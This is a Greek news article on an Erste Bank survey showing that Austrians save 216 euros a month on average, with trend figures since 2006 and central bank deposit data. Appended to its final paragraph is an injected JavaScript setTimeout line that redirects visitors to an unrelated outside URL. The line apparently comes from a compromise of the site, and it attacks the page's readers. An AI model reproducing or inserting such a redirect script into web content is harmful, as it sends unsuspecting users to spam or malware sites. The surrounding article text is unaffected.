Οι Αυστριακοί αποταμιεύουν κατά μέσο όρο 216 ευρώ το μήνα

0
8

 

Aποκαλυπτικά είναι τα στοιχεία έρευνας που ήρθε στο φως της δημοσιότητας και δείχνει ότι οι Αυστριακοί εξακολουθούν να αποταμιεύουν και μάλιστα περισσότερο απ’ ό,τι στο παρελθόν και το ποσό που κατά μέσο όρο «βάζουν στην άκρη» κάθε μήνα ανέρχεται σε 216 ευρώ.

Την έρευνα πραγματοποίησε η «Erste Bank», μία από τις τρεις μεγαλύτερες τράπεζες της χώρας.

Το «βιβλιάριο αποταμίευσης» είναι φέτος ο πιο προσφιλής τρόπος «επένδυσης» των χρημάτων για την πλειονότητα του αυστριακού πληθυσμού, δηλαδή για το 77% των 8,5 εκατομμύρια κατοίκων της χώρας, ποσοστό που είναι κατά 6% μεγαλύτερο από το αντίστοιχο πριν από δέκα χρόνια (2006).

Ακολουθούν οι άλλου είδους τραπεζικές καταθέσεις, οι ασφάλειες ζωής ή οι ασφάλειες συντάξεων, ενώ λιγότερο ελκυστικές εμφανίζονται οι μετοχές χρηματιστηρίου ή τα διάφορα είδη ομολόγων.

Σύμφωνα με την έρευνα, το μέσο μηνιαίο ποσό αποταμίευσης έχει παρουσιάσει συνεχή αύξηση τα προηγούμενα δέκα χρόνια, το 2006 ανερχόταν σε 132 ευρώ, το 2011 σε 168 ευρώ και εφέτος φτάνει τα 216 ευρώ.

Την ίδια στιγμή ελαφρά μείωση εμφανίζει η εκτίμηση του πληθυσμού ως προς τη σπουδαιότητα της αποταμίευσης, η οποία για το 69% είναι «πολύ» ή «αρκετά» σημαντική, ενώ πριν δέκα χρόνια, το 2006, το αντίστοιχο ποσοστό βρισκόταν στο 72%.

Όπως αναφέρουν τα στοιχεία της Αυστριακής Κεντρικής Τράπεζας, στα τέλη του περασμένου Ιουλίου το ύψος των ιδιωτικών καταθέσεων σε αυστριακές τράπεζες ήταν 230 δισεκατομμύρια ευρώ, παρουσιάζοντας αύξηση κατά 3,2% σε σχέση με τον Ιούλιο του 2015. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here